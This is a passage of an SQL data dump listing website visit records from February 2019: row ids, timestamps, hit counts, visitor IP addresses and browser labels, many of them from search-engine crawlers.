,(381909,1549303927,1,1,0,0,'46.229.168.143','other'),(381910,1549304051,2,2,0,0,'178.154.244.11','other'),(381911,1549304232,2,2,0,0,'216.244.66.241','other'),(381912,1549304300,3,3,0,0,'66.249.66.152','chrome'),(381913,1549304702,1,1,0,0,'23.101.169.3','msie'),(381914,1549304761,3,3,0,0,'66.249.66.156','chrome'),(381915,1549305147,1,1,0,0,'54.36.148.198','other'),(381916,1549305284,1,1,0,0,'5.35.27.94','chrome'),(381917,1549305308,1,1,0,0,'5.45.207.19','other'),(381918,1549305637,1,1,0,0,'8.29.198.27','other'),(381919,1549305947,1,1,0,0,'54.36.148.143','other'),(381920,1549305981,2,2,0,0,'66.249.66.152','chrome'),(381921,1549305997,1,1,0,0,'207.46.13.170','other'),(381922,1549306047,2,2,0,0,'66.249.66.154','chrome'),(381923,1549306092,1,1,0,0,'46.229.168.130','other'),(381924,1549306149,1,1,0,0,'54.36.148.214','other'),(381925,1549306542,1,1,0,0,'91.196.178.92','firefox'),(381926,1549306677,1,1,0,0,'31.172.140.18','firefox'),(381927,1549307147,4,4,0,0,'66.249.66.152','chrome'),(381928,1549307296,2,2,0,0,'216.244.66.241','other'),(381929,1549307366,1,1,0,0,'54.36.148.237','other'),(381930,1549308233,1,1,0,0,'66.249.66.152','chrome'),(381931,1549308402,2,2,0,0,'66.249.66.154','chrome'),(381932,1549308436,1,1,0,0,'46.229.168.138','other'),(381933,1549308447,3,3,0,0,'66.249.66.156','chrome'),(381934,1549308460,1,1,0,0,'54.36.148.112','other'),(381935,1549308601,1,1,0,0,'54.36.149.47','other'),(381936,1549309143,1,1,0,0,'46.229.168.136','other'),(381937,1549309215,1,1,0,0,'66.249.66.44','chrome'),(381938,1549309337,6,6,0,0,'66.249.66.152','chrome'),(381939,1549309383,3,3,0,0,'66.249.66.154','chrome'),(381940,1549309639,1,1,0,0,'54.36.148.129','other'),(381941,1549309778,1,1,0,0,'54.36.148.133','other'),(381942,1549309994,1,1,0,0,'54.36.148.141','other'),(381943,1549310006,2,2,0,0,'216.244.66.241','other'),(381944,1549310074,1,1,0,0,'207.46.13.86','other'),(381945,1549310766,1,1,0,0,'54.36.148.60','other'),(381946,1549310847,1,1,0,0,'31.202.122.198','firefox'),(381947,1549310860,1,1,0,0,'54.36.148.188','other'),(381948,1549311016,2,2,0,0,'66.249.66.152','chrome'),(381949,1549311145,1,1,0,0,'207.46.13.86','other'),(381950,1549311410,1,1,0,0,'13.57.233.99','chrome'),(381951,1549311449,1,1,0,0,'37.115.190.172','msie'),(381952,1549311503,1,1,0,0,'54.36.148.84','other'),(381953,1549311512,1,1,0,0,'54.36.148.146','other'),(381954,1549311678,1,1,0,0,'66.249.66.156','chrome'),(381955,1549311771,1,1,0,0,'54.36.148.61','other'),(381956,1549311857,1,1,0,0,'46.229.168.130','other'),(381957,1549311920,1,1,0,0,'46.229.168.148','other'),(381958,1549312073,1,1,0,0,'54.36.148.177','other'),(381959,1549312133,1,1,0,0,'46.229.168.147','other'),(381960,1549312882,1,1,0,0,'54.36.149.71','other'),(381961,1549313057,1,1,0,0,'66.249.66.152','chrome'),(381962,1549313392,1,1,0,0,'5.45.207.19','other'),(381963,1549313541,1,1,0,0,'66.249.66.42','chrome'),(381964,1549313549,2,2,0,0,'66.249.66.154','chrome'),(381965,1549313608,1,1,0,0,'46.229.168.137','other'),(381966,1549313897,1,1,0,0,'176.122.101.217','chrome'),(381967,1549313971,1,1,0,0,'54.36.148.65','other'),(381968,1549314227,1,1,0,0,'54.36.149.67','other'),(381969,1549314272,1,1,0,0,'54.36.148.112','other'),(381970,1549314465,1,1,0,0,'8.29.198.25','other'),(381971,1549314491,1,1,0,0,'54.36.148.99','other'),(381972,1549314859,1,1,0,0,'207.46.13.192','other'),(381973,1549315036,1,1,0,0,'66.249.66.156','chrome'),(381974,1549315077,1,1,0,0,'46.229.168.134','other'),(381975,1549315128,1,1,0,0,'216.244.66.241','other'),(381976,1549315325,1,1,0,0,'66.249.66.42','chrome'),(381977,1549315402,1,1,0,0,'54.36.148.70','other'),(381978,1549315486,1,1,0,0,'91.209.11.236','other'),(381979,1549316078,1,1,0,0,'54.36.148.100','other'),(381980,1549316390,1,1,0,0,'66.249.66.156','chrome'),(381981,1549316465,1,1,0,0,'66.249.66.154','chrome'),(381982,1549316475,1,1,0,0,'8.29.198.25','other'),(381983,1549316649,1,1,0,0,'46.229.168.136','other'),(381984,1549317284,3,3,0,0,'216.244.66.241','other'),(381985,1549317790,1,1,0,0,'54.36.148.214','other'),(381986,1549317883,1,1,0,0,'54.36.148.80','other'),(381987,1549318069,3,3,0,0,'66.249.66.156','chrome'),(381988,1549318323,1,1,0,0,'46.229.168.140','other'),(381989,1549318335,1,1,0,0,'54.36.149.33','other'),(381990,1549318350,1,1,0,0,'54.36.148.242','other'),(381991,1549318397,2,2,0,0,'66.249.66.152','chrome'),(381992,1549318443,2,2,0,0,'66.249.66.154','chrome'),(381993,1549318544,1,1,0,0,'54.36.149.85','other'),(381994,1549318662,1,1,0,0,'54.36.148.91','other'),(381995,1549319103,1,1,0,0,'46.229.168.144','other'),(381996,1549319799,3,3,0,0,'66.249.66.156','chrome'),(381997,1549319846,1,1,0,0,'66.249.66.152','chrome'),(381998,1549320033,1,1,0,0,'54.36.148.34','other'),(381999,1549320088,2,2,0,0,'66.249.66.154','chrome'),(382000,1549320530,1,1,0,0,'216.244.66.241','other'),(382001,1549321011,3,3,0,0,'66.249.66.154','chrome'),(382002,1549321081,3,3,0,0,'66.249.66.156','chrome'),(382003,1549321141,1,1,0,0,'54.36.149.8','other'),(382004,1549321217,6,6,0,0,'66.249.66.152','chrome'),(382005,1549321806,1,1,0,0,'207.46.13.197','other'),(382006,1549321959,1,1,0,0,'54.36.148.78','other'),(382007,1549322021,3,3,0,0,'66.249.66.154','chrome'),(382008,1549322416,1,1,0,0,'54.36.148.120','other'),(382009,1549322891,1,1,0,0,'54.36.148.111','other'),(382010,1549323077,2,2,0,0,'66.249.66.154','chrome'),(382011,1549323114,4,4,0,0,'66.249.66.152','chrome'),(382012,1549323146,1,1,0,0,'216.244.66.241','other'),(382013,1549323577,2,2,0,0,'46.229.168.144','other'),(382014,1549323778,2,2,0,0,'40.77.167.113','other'),(382015,1549324147,2,2,0,0,'66.249.66.42','chrome'),(382016,1549324847,1,1,0,0,'54.36.149.76','other'),(382017,1549324930,1,1,0,0,'54.36.148.100','other'),(382018,1549325107,1,1,0,0,'46.229.168.152','other'),(382019,1549325162,1,1,0,0,'68.183.148.48','other'),(382020,1549325321,1,1,0,0,'8.29.198.25','other'),(382021,1549325364,1,1,0,0,'54.36.149.11','other'),(382022,1549325563,1,1,0,0,'54.36.149.83','other'),(382023,1549325833,1,1,0,0,'46.229.168.132','other'),(382024,1549325866,1,1,0,0,'157.55.39.220','other'),(382025,1549326171,1,1,0,0,'54.36.148.113','other'),(382026,1549326183,1,1,0,0,'207.46.13.38','other'),(382027,1549326234,1,1,0,0,'159.65.173.220','other'),(382028,1549326691,1,1,0,0,'46.229.168.147','other'),(382029,1549327054,1,1,0,0,'66.249.66.152','chrome'),(382030,1549327104,1,1,0,0,'46.229.168.135','other'),(382031,1549327187,1,1,0,0,'66.249.66.156','chrome'),(382032,1549327220,1,1,0,0,'54.36.148.152','other'),(382033,1549327305,1,1,0,0,'8.29.198.26','other'),(382034,1549327891,1,1,0,0,'46.229.168.146','other'),(382035,1549328109,1,1,0,0,'51.15.128.3','other'),(382036,1549328183,1,1,0,0,'66.249.66.154','chrome'),(382037,1549328274,2,2,0,0,'216.244.66.241','other'),(382038,1549328533,1,1,0,0,'66.249.66.156','chrome'),(382039,1549328601,1,1,0,0,'46.229.168.141','other'),(382040,1549328643,1,1,0,0,'141.8.142.103','other'),(382041,1549329408,1,1,0,0,'54.36.148.18','other'),(382042,1549329526,3,3,0,0,'157.55.39.164','other'),(382043,1549330180,1,1,0,0,'54.36.148.112','other'),(382044,1549330374,1,1,0,0,'46.229.168.145','other'),(382045,1549330508,1,1,0,0,'66.249.66.152','chrome'),(382046,1549330553,2,2,0,0,'66.249.66.154','chrome'),(382047,1549330678,2,2,0,0,'54.213.31.68','chrome'),(382048,1549331516,3,3,0,0,'66.249.66.152','chrome'),(382049,1549331751,4,4,0,0,'66.249.66.154','chrome'),(382050,1549331828,1,1,0,0,'216.244.66.241','other'),(382051,1549332272,1,1,0,0,'157.55.39.164','other'),(382052,1549332361,1,1,0,0,'46.229.168.136','other'),(382053,1549332690,1,1,0,0,'66.249.66.154','chrome'),(382054,1549333028,1,1,0,0,'46.229.168.132','other'),(382055,1549333059,3,3,0,0,'66.249.66.152','chrome'),(382056,1549333198,1,1,0,0,'157.55.39.164','other'),(382057,1549333311,1,1,0,0,'46.229.168.129','other'),(382058,1549333386,1,1,0,0,'46.229.168.138','other'),(382059,1549333964,1,1,0,0,'66.249.66.154','chrome'),(382060,1549334034,2,2,0,0,'66.249.66.152','chrome'),(382061,1549334136,1,1,0,0,'216.244.66.241','other'),(382062,1549334275,1,1,0,0,'157.55.39.184','other'),(382063,1549334551,1,1,0,0,'66.249.66.40','chrome'),(382064,1549334592,1,1,0,0,'66.249.66.42','chrome'),(382065,1549334893,1,1,0,0,'66.249.66.154','chrome'),(382066,1549334989,1,1,0,0,'66.249.66.156','chrome'),(382067,1549335147,1,1,0,0,'46.229.168.134','other'),(382068,1549335160,1,1,0,0,'141.8.142.103','other'),(382069,1549335978,1,1,0,0,'46.229.168.138','other'),(382070,1549336177,1,1,0,0,'8.29.198.27','other'),(382071,1549336421,1,1,0,0,'66.249.66.156','chrome'),(382072,1549336986,1,1,0,0,'46.229.168.154','other'),(382073,1549337084,1,1,0,0,'178.255.215.94','other'),(382074,1549337152,1,1,0,0,'157.55.39.184','other'),(382075,1549337800,1,1,0,0,'46.229.168.153','other'),(382076,1549337909,1,1,0,0,'34.231.241.191','chrome'),(382077,1549338149,1,1,0,0,'8.29.198.26','other'),(382078,1549338241,2,2,0,0,'66.249.66.156','chrome'),(382079,1549338405,2,2,0,0,'66.249.66.154','chrome'),(382080,1549338808,1,1,0,0,'66.249.66.152','chrome'),(382081,1549338878,1,1,0,0,'157.55.39.164','other'),(382082,1549338934,1,1,0,0,'66.249.66.42','chrome'),(382083,1549339151,22,22,0,0,'46.4.107.106','other'),(382084,1549339389,1,1,0,0,'66.249.66.154','chrome'),(382085,1549339714,1,1,0,0,'157.55.39.236','other'),(382086,1549340052,16,16,0,0,'46.4.107.106','other'),(382087,1549340071,1,1,0,0,'216.244.66.241','other'),(382088,1549340633,1,1,0,0,'46.229.168.147','other'),(382089,1549340956,13,13,0,0,'46.4.107.106','other'),(382090,1549341318,2,2,0,0,'66.249.66.154','chrome'),(382091,1549341404,1,1,0,0,'46.229.168.134','other'),(382092,1549341532,1,1,0,0,'46.229.168.130','other'),(382093,1549341789,1,1,0,0,'66.249.66.156','chrome'),(382094,1549341860,14,14,0,0,'46.4.107.106','other'),(382095,1549342076,1,1,0,0,'66.249.66.152','chrome'),(382096,1549342192,1,1,0,0,'46.229.168.139','other'),(382097,1549342524,1,1,0,0,'66.249.66.42','chrome'),(382098,1549342719,1,1,0,0,'216.244.66.241','other'),(382099,1549342762,12,12,0,0,'46.4.107.106','other'),(382100,1549343294,1,1,0,0,'66.249.66.156','chrome'),(382101,1549343317,3,3,0,0,'66.249.66.154','chrome'),(382102,1549343404,1,1,0,0,'46.229.168.136','other'),(382103,1549343664,14,14,0,0,'46.4.107.106','other'),(382104,1549343723,1,1,0,0,'46.229.168.130','other'),(382105,1549344018,11,11,0,0,'157.55.39.164','other'),(382106,1549344029,1,1,0,0,'157.55.39.184','other'),(382107,1549344034,3,3,0,0,'157.55.39.236','other'),(382108,1549344038,10,10,0,0,'157.55.39.7','other'),(382109,1549344123,2,2,0,0,'66.249.66.152','chrome'),(382110,1549344565,14,14,0,0,'46.4.107.106','other'),(382111,1549344714,2,2,0,0,'66.249.66.154','chrome'),(382112,1549345444,1,1,0,0,'66.249.66.152','chrome'),(382113,1549345468,10,10,0,0,'46.4.107.106','other'),(382114,1549345805,1,1,0,0,'157.55.39.7','other'),(382115,1549346121,4,4,0,0,'66.249.66.154','chrome'),(382116,1549346369,2,2,0,0,'46.4.107.106','other'),(382117,1549346743,1,1,0,0,'46.229.168.153','other'),(382118,1549346747,2,2,0,0,'66.249.66.156','chrome'),(382119,1549346912,1,1,0,0,'46.229.168.146','other'),(382120,1549347017,1,1,0,0,'8.29.198.25','other'),(382121,1549347486,1,1,0,0,'66.249.66.154','chrome'),(382122,1549347696,1,1,0,0,'157.55.39.236','other'),(382123,1549348015,2,2,0,0,'157.55.39.164','other'),(382124,1549348083,1,1,0,0,'66.249.66.40','chrome'),(382125,1549348153,1,1,0,0,'66.249.66.44','chrome'),(382126,1549348270,1,1,0,0,'66.249.66.152','chrome'),(382127,1549348402,1,1,0,0,'176.31.180.157','other'),(382128,1549348603,1,1,0,0,'66.249.66.156','chrome'),(382129,1549348984,1,1,0,0,'8.29.198.25','other'),(382130,1549349451,1,1,0,0,'91.196.178.70','chrome'),(382131,1549349569,2,2,0,0,'66.249.66.156','chrome'),(382132,1549350035,1,1,0,0,'157.55.39.236','other'),(382133,1549350410,1,1,0,0,'46.229.168.143','other'),(382134,1549350536,1,1,0,0,'66.249.66.154','chrome'),(382135,1549350641,1,1,0,0,'91.196.178.74','chrome'),(382136,1549350662,1,1,0,0,'37.52.75.144','chrome'),(382137,1549351021,2,2,0,0,'216.244.66.241','other'),(382138,1549352535,1,1,0,0,'66.249.66.42','chrome'),(382139,1549352545,1,1,0,0,'46.229.168.135','other'),(382140,1549352680,1,1,0,0,'46.229.168.152','other'),(382141,1549352710,1,1,0,0,'66.249.66.156','chrome'),(382142,1549352740,1,1,0,0,'91.195.156.90','chrome'),(382143,1549352760,1,1,0,0,'46.229.168.144','other'),(382144,1549353213,1,1,0,0,'91.196.178.74','chrome'),(382145,1549353325,2,2,0,0,'216.244.66.241','other'),(382146,1549354147,1,1,0,0,'37.55.192.142','chrome'),(382147,1549354228,1,1,0,0,'46.229.168.138','other'),(382148,1549354635,1,1,0,0,'46.229.168.151','other'),(382149,1549355167,2,2,0,0,'157.55.39.164','other'),(382150,1549355510,2,2,0,0,'91.196.178.67','chrome'),(382151,1549356095,1,1,0,0,'66.249.66.156','chrome'),(382152,1549356107,1,1,0,0,'66.249.66.152','chrome'),(382153,1549356178,1,1,0,0,'91.196.178.188','chrome'),(382154,1549356220,1,1,0,0,'216.244.66.241','other'),(382155,1549356292,1,1,0,0,'46.229.168.143','other'),(382156,1549356449,1,1,0,0,'46.229.168.139','other'),(382157,1549357150,1,1,0,0,'66.249.66.154','chrome'),(382158,1549357867,1,1,0,0,'8.29.198.25','other'),(382159,1549357883,1,1,0,0,'62.205.134.182','msie'),(382160,1549358802,1,1,0,0,'46.229.168.142','other'),(382161,1549358804,1,1,0,0,'62.205.134.182','msie'),(382162,1549359003,1,1,0,0,'66.249.66.40','chrome'),(382163,1549359060,2,2,0,0,'216.244.66.241','other'),(382164,1549359259,1,1,0,0,'178.154.244.11','other'),(382165,1549359292,1,1,0,0,'157.55.39.164','other'),(382166,1549359833,1,1,0,0,'8.29.198.26','other'),(382167,1549359937,1,1,0,0,'62.205.134.182','msie'),(382168,1549360360,1,1,0,0,'31.42.165.212','chrome'),(382169,1549360523,1,1,0,0,'95.133.55.29','chrome'),(382170,1549360798,1,1,0,0,'66.249.66.154','chrome'),(382171,1549361100,1,1,0,0,'157.55.39.236','other'),(382172,1549361876,1,1,0,0,'216.244.66.241','other'),(382173,1549362922,1,1,0,0,'157.55.39.235','other'),(382174,1549363335,1,1,0,0,'78.111.190.54','chrome'),(382175,1549363842,1,1,0,0,'91.196.178.178','chrome'),(382176,1549364084,1,1,0,0,'185.143.147.220','chrome'),(382177,1549365039,1,1,0,0,'207.46.13.48','other'),(382178,1549365096,1,1,0,0,'80.64.80.122','chrome'),(382179,1549365485,1,1,0,0,'66.249.66.156','chrome'),(382180,1549366119,1,1,0,0,'46.133.106.149','chrome'),(382181,1549366279,1,1,0,0,'91.196.178.172','chrome'),(382182,1549366838,1,1,0,0,'80.64.80.122','chrome'),(382183,1549367161,1,1,0,0,'66.249.66.152','chrome'),(382184,1549367682,1,1,0,0,'40.77.167.68','other'),(382185,1549367801,1,1,0,0,'91.196.178.178','chrome'),(382186,1549367974,1,1,0,0,'194.44.179.191','chrome'),(382187,1549368727,1,1,0,0,'8.29.198.27','other'),(382188,1549369434,1,1,0,0,'37.52.19.237','chrome'),(382189,1549369518,1,1,0,0,'40.77.167.69','other'),(382190,1549369902,1,1,0,0,'136.0.99.243','chrome'),(382191,1549369990,1,1,0,0,'216.244.66.241','other'),(382192,1549370066,2,2,0,0,'91.242.55.34','chrome'),(382193,1549370228,1,1,0,0,'91.124.181.19','chrome'),(382194,1549370676,1,1,0,0,'8.29.198.26','other'),(382195,1549370798,1,1,0,0,'46.229.168.136','other'),(382196,1549370836,2,2,0,0,'91.196.178.131','chrome'),(382197,1549371745,1,1,0,0,'46.229.168.146','other'),(382198,1549371759,1,1,0,0,'207.46.13.237','other'),(382199,1549371957,1,1,0,0,'66.249.66.152','chrome'),(382200,1549372235,1,1,0,0,'40.77.167.62','other'),(382201,1549372359,1,1,0,0,'95.132.60.18','firefox'),(382202,1549372505,1,1,0,0,'216.244.66.241','other'),(382203,1549372555,1,1,0,0,'91.195.156.46','chrome'),(382204,1549372869,1,1,0,0,'207.46.13.115','other'),(382205,1549372940,1,1,0,0,'37.53.123.48','chrome'),(382206,1549373037,1,1,0,0,'91.196.178.77','chrome'),(382207,1549373084,1,1,0,0,'46.229.168.136','other'),(382208,1549373252,1,1,0,0,'40.77.167.69','other'),(382209,1549373521,2,2,0,0,'91.196.178.74','chrome'),(382210,1549373707,1,1,0,0,'66.249.66.156','chrome'),(382211,1549373776,2,2,0,0,'66.249.66.154','chrome'),(382212,1549373835,1,1,0,0,'66.249.66.152','chrome'),(382213,1549374008,4,4,0,0,'216.244.66.241','other'),(382214,1549374066,1,1,0,0,'91.209.55.69','chrome'),(382215,1549374659,2,2,0,0,'40.77.167.69','other'),(382216,1549375099,2,2,0,0,'207.46.13.246','other'),(382217,1549375937,1,1,0,0,'66.249.66.154','chrome'),(382218,1549376106,1,1,0,0,'40.77.167.62','other'),(382219,1549376195,1,1,0,0,'46.229.168.136','other'),(382220,1549376918,1,1,0,0,'40.77.167.69','other'),(382221,1549377884,1,1,0,0,'91.196.178.67','chrome'),(382222,1549377898,1,1,0,0,'78.137.4.182','firefox'),(382223,1549377904,1,1,0,0,'80.64.80.122','chrome'),(382224,1549377992,1,1,0,0,'66.249.66.44','chrome'),(382225,1549378244,1,1,0,0,'207.46.13.115','other'),(382226,1549378587,1,1,0,0,'66.249.66.152','chrome'),(382227,1549379332,1,1,0,0,'91.196.178.67','chrome'),(382228,1549379590,1,1,0,0,'8.29.198.25','other'),(382229,1549379802,1,1,0,0,'91.196.178.77','chrome'),(382230,1549379871,1,1,0,0,'66.249.66.154','chrome'),(382231,1549380290,1,1,0,0,'216.244.66.241','other'),(382232,1549380985,1,1,0,0,'91.196.178.94','chrome'),(382233,1549381124,1,1,0,0,'213.108.54.36','chrome'),(382234,1549381309,1,1,0,0,'46.229.168.136','other'),(382235,1549381464,2,2,0,0,'40.77.167.52','other'),(382236,1549381502,1,1,0,0,'40.77.167.62','other'),(382237,1549381532,1,1,0,0,'8.29.198.25','other'),(382238,1549381596,1,1,0,0,'40.77.167.69','other'),(382239,1549381894,1,1,0,0,'188.163.16.223','chrome'),(382240,1549382363,2,2,0,0,'213.180.203.9','other'),(382241,1549382367,2,2,0,0,'87.250.224.64','other'),(382242,1549382370,4,4,0,0,'178.154.244.11','other'),(382243,1549382381,1,1,0,0,'178.154.171.27','other'),(382244,1549382384,3,3,0,0,'141.8.142.103','other'),(382245,1549382387,7,7,0,0,'5.45.207.79','other'),(382246,1549382390,11,11,0,0,'5.45.207.19','other'),(382247,1549382480,3,3,0,0,'95.108.213.4','other'),(382248,1549382502,1,1,0,0,'46.229.168.153','other'),(382249,1549382516,2,2,0,0,'141.8.183.23','other'),(382250,1549382551,1,1,0,0,'95.108.181.54','other'),(382251,1549382566,1,1,0,0,'141.8.142.162','other'),(382252,1549382569,1,1,0,0,'141.8.142.144','other'),(382253,1549382802,2,2,0,0,'66.249.66.44','chrome'),(382254,1549382935,2,2,0,0,'66.249.66.152','chrome'),(382255,1549383121,1,1,0,0,'91.196.178.77','chrome'),(382256,1549383398,7,7,0,0,'178.154.244.11','other'),(382257,1549383408,3,3,0,0,'87.250.224.81','other'),(382258,1549383410,7,7,0,0,'87.250.224.65','other'),(382259,1549383417,5,5,0,0,'37.9.113.148','other'),(382260,1549383426,4,4,0,0,'95.108.213.4','other'),(382261,1549383440,10,10,0,0,'5.45.207.19','other'),(382262,1549383441,1,1,0,0,'141.8.142.108','other'),(382263,1549383444,6,6,0,0,'5.45.207.79','other'),(382264,1549383446,1,1,0,0,'213.180.203.9','other'),(382265,1549383447,1,1,0,0,'213.180.203.17','other'),(382266,1549383451,1,1,0,0,'178.154.171.27','other'),(382267,1549383453,1,1,0,0,'178.154.171.17','other'),(382268,1549383456,2,2,0,0,'178.154.200.48','other'),(382269,1549383460,2,2,0,0,'37.9.113.103','other'),(382270,1549383461,2,2,0,0,'178.154.244.49','other'),(382271,1549383462,1,1,0,0,'141.8.183.23','other'),(382272,1549383911,1,1,0,0,'46.229.168.129','other'),(382273,1549383956,1,1,0,0,'141.8.183.22','other'),(382274,1549383958,2,2,0,0,'178.154.244.65','other'),(382275,1549383974,2,2,0,0,'95.108.181.75','other'),(382276,1549383975,1,1,0,0,'87.250.224.107','other'),(382277,1549384024,4,4,0,0,'141.8.142.103','other'),(382278,1549384248,3,3,0,0,'141.8.132.16','other'),(382279,1549384348,7,7,0,0,'178.154.244.11','other'),(382280,1549384367,6,6,0,0,'5.45.207.19','other'),(382281,1549384368,1,1,0,0,'213.180.203.48','other'),(382282,1549384514,1,1,0,0,'60.191.38.77','firefox'),(382283,1549384528,11,11,0,0,'5.45.207.79','other'),(382284,1549384552,3,3,0,0,'95.108.213.4','other'),(382285,1549384582,1,1,0,0,'213.180.203.53','other'),(382286,1549384583,1,1,0,0,'213.180.203.9','other'),(382287,1549384695,1,1,0,0,'46.211.119.203','chrome'),(382288,1549384739,6,6,0,0,'37.9.113.148','other'),(382289,1549384778,2,2,0,0,'141.8.142.144','other'),(382290,1549384788,4,4,0,0,'37.9.113.20','other'),(382291,1549384793,2,2,0,0,'95.108.181.54','other'),(382292,1549384880,1,1,0,0,'87.250.224.64','other'),(382293,1549384887,2,2,0,0,'37.9.113.103','other'),(382294,1549384924,1,1,0,0,'213.180.203.40','other'),(382295,1549384928,2,2,0,0,'141.8.142.38','other'),(382296,1549384938,1,1,0,0,'178.154.171.27','other'),(382297,1549384939,2,2,0,0,'213.180.203.17','other'),(382298,1549384947,1,1,0,0,'141.8.142.103','other'),(382299,1549384973,1,1,0,0,'141.8.142.108','other'),(382300,1549384985,1,1,0,0,'5.45.207.8','other'),(382301,1549385000,1,1,0,0,'95.108.181.75','other'),(382302,1549385003,1,1,0,0,'178.154.171.30','other'),(382303,1549385007,4,4,0,0,'87.250.224.65','other'),(382304,1549385274,5,5,0,0,'5.45.207.19','other'),(382305,1549385358,1,1,0,0,'91.195.156.46','chrome'),(382306,1549385563,1,1,0,0,'66.249.66.42','chrome'),(382307,1549385580,1,1,0,0,'95.108.213.4','other'),(382308,1549385649,5,5,0,0,'66.249.66.40','chrome'),(382309,1549385698,1,1,0,0,'178.154.244.65','other'),(382310,1549385712,1,1,0,0,'66.249.66.44','chrome'),(382311,1549385738,3,3,0,0,'37.9.113.20','other'),(382312,1549385745,1,1,0,0,'40.77.167.52','other'),(382313,1549385890,2,2,0,0,'5.45.207.79','other'),(382314,1549385953,1,1,0,0,'66.249.66.38','chrome'),(382315,1549385965,1,1,0,0,'213.180.203.40','other'),(382316,1549385990,5,5,0,0,'178.154.244.11','other'),(382317,1549386116,1,1,0,0,'60.191.38.77','firefox'),(382318,1549386145,1,1,0,0,'37.9.113.103','other'),(382319,1549386255,2,2,0,0,'213.180.203.9','other'),(382320,1549386271,1,1,0,0,'95.108.181.75','other'),(382321,1549386340,1,1,0,0,'178.154.200.48','other'),(382322,1549386363,1,1,0,0,'141.8.132.16','other'),(382323,1549386480,2,2,0,0,'216.244.66.241','other'),(382324,1549386512,3,3,0,0,'141.8.142.103','other'),(382325,1549386539,1,1,0,0,'178.154.244.49','other'),(382326,1549386557,1,1,0,0,'5.255.253.38','other'),(382327,1549386627,1,1,0,0,'40.77.167.69','other'),(382328,1549386632,2,2,0,0,'95.108.213.4','other'),(382329,1549386678,1,1,0,0,'66.249.66.40','chrome'),(382330,1549386692,1,1,0,0,'213.180.203.48','other'),(382331,1549386719,2,2,0,0,'37.9.113.148','other'),(382332,1549386815,1,1,0,0,'40.77.167.62','other'),(382333,1549386821,4,4,0,0,'5.45.207.79','other'),(382334,1549386842,2,2,0,0,'5.45.207.19','other'),(382335,1549386853,1,1,0,0,'87.250.224.65','other'),(382336,1549386854,1,1,0,0,'87.250.224.81','other'),(382337,1549386858,1,1,0,0,'178.154.244.65','other'),(382338,1549386920,1,1,0,0,'46.229.168.144','other'),(382339,1549386977,1,1,0,0,'46.229.168.135','other'),(382340,1549387020,1,1,0,0,'207.46.13.115','other'),(382341,1549387028,6,6,0,0,'178.154.244.11','other'),(382342,1549387468,1,1,0,0,'141.8.142.103','other'),(382343,1549387777,1,1,0,0,'46.229.168.149','other'),(382344,1549387938,1,1,0,0,'5.45.207.19','other'),(382345,1549387964,2,2,0,0,'5.45.207.79','other'),(382346,1549388043,1,1,0,0,'37.9.113.148','other'),(382347,1549388087,1,1,0,0,'95.108.213.4','other'),(382348,1549388383,2,2,0,0,'216.244.66.241','other'),(382349,1549389423,1,1,0,0,'23.103.64.39','other'),(382350,1549389633,3,3,0,0,'37.9.113.103','other'),(382351,1549389640,2,2,0,0,'95.108.213.4','other'),(382352,1549389642,1,1,0,0,'5.45.207.19','other'),(382353,1549389643,2,2,0,0,'141.8.142.103','other'),(382354,1549389649,2,2,0,0,'37.9.113.148','other'),(382355,1549389663,1,1,0,0,'87.250.224.81','other'),(382356,1549389664,1,1,0,0,'178.154.244.11','other'),(382357,1549389672,1,1,0,0,'5.45.207.79','other'),(382358,1549389864,2,2,0,0,'40.77.167.52','other'),(382359,1549390194,8,8,0,0,'51.15.21.189','other'),(382360,1549390213,2,2,0,0,'216.244.66.241','other'),(382361,1549390382,1,1,0,0,'66.249.66.142','chrome'),(382362,1549390443,1,1,0,0,'8.29.198.26','other'),(382363,1549390638,1,1,0,0,'66.249.66.42','chrome'),(382364,1549391066,1,1,0,0,'5.45.207.19','other'),(382365,1549391168,1,1,0,0,'91.233.49.242','chrome'),(382366,1549391434,1,1,0,0,'216.244.66.241','other'),(382367,1549391541,1,1,0,0,'46.229.168.132','other'),(382368,1549391812,2,2,0,0,'37.53.111.115','chrome'),(382369,1549391966,2,2,0,0,'178.154.244.11','other'),(382370,1549391968,2,2,0,0,'141.8.142.103','other'),(382371,1549391978,2,2,0,0,'5.45.207.19','other'),(382372,1549392022,2,2,0,0,'40.77.167.69','other'),(382373,1549392309,1,1,0,0,'207.46.13.115','other'),(382374,1549392356,1,1,0,0,'91.196.178.162','chrome'),(382375,1549392389,1,1,0,0,'8.29.198.27','other'),(382376,1549392733,1,1,0,0,'37.53.111.115','chrome'),(382377,1549392960,1,1,0,0,'91.196.178.50','chrome'),(382378,1549394219,48,48,0,0,'173.212.236.123','other'),(382379,1549394228,1,1,0,0,'40.77.167.69','other'),(382380,1549394258,1,1,0,0,'66.249.66.40','chrome'),(382381,1549394736,1,1,0,0,'66.249.66.156','chrome'),(382382,1549394837,1,1,0,0,'5.45.207.19','other'),(382383,1549395146,4,4,0,0,'5.9.156.30','other'),(382384,1549395387,19,19,0,0,'173.212.236.123','other'),(382385,1549395543,2,2,0,0,'69.30.198.186','other'),(382386,1549395767,1,1,0,0,'40.77.167.62','other'),(382387,1549396094,1,1,0,0,'66.249.66.152','chrome'),(382388,1549396508,1,1,0,0,'66.249.66.154','chrome'),(382389,1549397335,1,1,0,0,'46.229.168.136','other'),(382390,1549397430,1,1,0,0,'66.249.66.148','chrome'),(382391,1549397487,2,2,0,0,'66.249.66.144','chrome'),(382392,1549397857,1,1,0,0,'46.211.135.77','chrome'),(382393,1549398942,2,2,0,0,'66.249.66.156','chrome'),(382394,1549399180,23,23,0,0,'5.189.169.233','other'),(382395,1549399227,2,2,0,0,'216.244.66.241','other'),(382396,1549399806,1,1,0,0,'66.249.66.40','chrome'),(382397,1549400723,2,2,0,0,'157.55.39.248','other'),(382398,1549400897,1,1,0,0,'207.46.13.115','other'),(382399,1549401053,1,1,0,0,'46.229.168.137','other'),(382400,1549401130,1,1,0,0,'46.229.168.154','other'),(382401,1549401155,1,1,0,0,'66.249.66.152','chrome'),(382402,1549401300,1,1,0,0,'8.29.198.25','other'),(382403,1549401601,2,2,0,0,'66.249.66.156','chrome'),(382404,1549401653,1,1,0,0,'40.77.167.69','other'),(382405,1549401722,1,1,0,0,'157.55.39.248','other'),(382406,1549401924,1,1,0,0,'141.8.142.103','other'),(382407,1549401953,3,3,0,0,'5.45.207.79','other'),(382408,1549401968,3,3,0,0,'5.45.207.19','other'),(382409,1549402144,1,1,0,0,'95.108.213.4','other'),(382410,1549402257,1,1,0,0,'37.9.113.103','other'),(382411,1549402734,1,1,0,0,'66.249.66.40','chrome'),(382412,1549402735,1,1,0,0,'108.59.8.70','other'),(382413,1549402797,3,3,0,0,'66.249.66.154','chrome'),(382414,1549402811,2,2,